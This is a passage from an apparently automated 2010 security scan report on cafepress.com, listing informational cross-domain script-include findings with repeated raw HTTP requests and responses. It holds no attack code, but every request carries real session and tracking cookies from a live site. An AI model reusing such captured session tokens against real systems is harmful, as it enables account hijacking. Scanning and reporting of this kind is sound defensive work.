__utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 71150
Date: Sun, 26 Dec 2010 13:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.55. http://www.cafepress.com/make/custom-buttons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-buttons

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 54710
Date: Sun, 26 Dec 2010 13:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.56. http://www.cafepress.com/make/custom-hats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-hats

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.57. http://www.cafepress.com/make/custom-hoodies-sweatshirts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-hoodies-sweatshirts

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.58. http://www.cafepress.com/make/custom-ipad-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-ipad-case

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 55427
Date: Sun, 26 Dec 2010 13:48:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

   <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...



<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.59. http://www.cafepress.com/make/custom-iphone-cases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-iphone-cases

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 57068
Date: Sun, 26 Dec 2010 13:48:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.60. http://www.cafepress.com/make/custom-mugs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-mugs

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 53712
Date: Sun, 26 Dec 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.61. http://www.cafepress.com/make/custom-stickers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stickers

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 